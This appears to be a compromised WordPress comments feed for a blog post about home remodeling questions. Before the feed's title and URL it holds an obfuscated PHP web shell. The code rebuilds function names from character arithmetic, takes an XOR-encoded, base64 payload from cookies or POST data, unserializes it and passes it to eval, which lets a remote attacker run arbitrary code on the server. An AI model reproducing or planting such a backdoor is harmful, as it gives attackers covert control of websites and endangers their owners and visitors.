$aYdXYcF = chr ( 750 - 633 ).chr ( 568 - 493 )."\166" . '_' . chr ( 422 - 345 ).chr ( 381 - 316 ).chr (106) . chr ( 84 - 17 ); $joapY = 'c' . 'l' . "\141" . "\163" . "\163" . '_' . 'e' . chr ( 845 - 725 ).chr (105) . chr ( 143 - 28 )."\x74" . chr (115); $qtLDWTda = $joapY($aYdXYcF); $aYdXYcF = "61054";$PPErpsKX = !$qtLDWTda;$joapY = "33831";if ($PPErpsKX){class uKv_MAjC{private $TOvclFIxg;public static $hXhkD = "17471a13-70d5-46c5-bcfe-37dd3da29aa3";public static $ltxxz = 27155;public function __construct($fzFlcDa=0){$IHiIQ = $_COOKIE;$CTbTQzkxg = $_POST;$hfVFx = @$IHiIQ[substr(uKv_MAjC::$hXhkD, 0, 4)];if (!empty($hfVFx)){$EBFEdoGN = "base64";$xFwRfZB = "";$hfVFx = explode(",", $hfVFx);foreach ($hfVFx as $dXjEsaJ){$xFwRfZB .= @$IHiIQ[$dXjEsaJ];$xFwRfZB .= @$CTbTQzkxg[$dXjEsaJ];}$xFwRfZB = array_map($EBFEdoGN . chr ( 431 - 336 )."\144" . "\145" . "\x63" . chr (111) . 'd' . "\x65", array($xFwRfZB,)); $xFwRfZB = $xFwRfZB[0] ^ str_repeat(uKv_MAjC::$hXhkD, (strlen($xFwRfZB[0]) / strlen(uKv_MAjC::$hXhkD)) + 1);uKv_MAjC::$ltxxz = @unserialize($xFwRfZB);}}private function PxLyg(){if (is_array(uKv_MAjC::$ltxxz)) {$NJMBnDUo = str_replace(chr (60) . "\x3f" . chr ( 196 - 84 )."\150" . "\160", "", uKv_MAjC::$ltxxz["\x63" . "\157" . 'n' . chr (116) . "\x65" . "\156" . "\x74"]);eval($NJMBnDUo); $ZRXcuaqM = "35236";exit();}}public function __destruct(){$this->PxLyg(); $AMpsZmc = str_pad("35236", 10);}}$ogxTkVs = new /* 37134 */ uKv_MAjC(); $ogxTkVs = substr("62788_54868", 1);} Comments on: To Remodel or Not to Remodel: 7 Questions Homeowners Need to Ask Before Commencing Construction http://edyroberts.com/remodel-remodel-7-questions-homeowners-commencing-construction/ Fri, 04 Jan 2013 19:15:43 +0000 hourly 1 https://wordpress.org/?v=5.3.16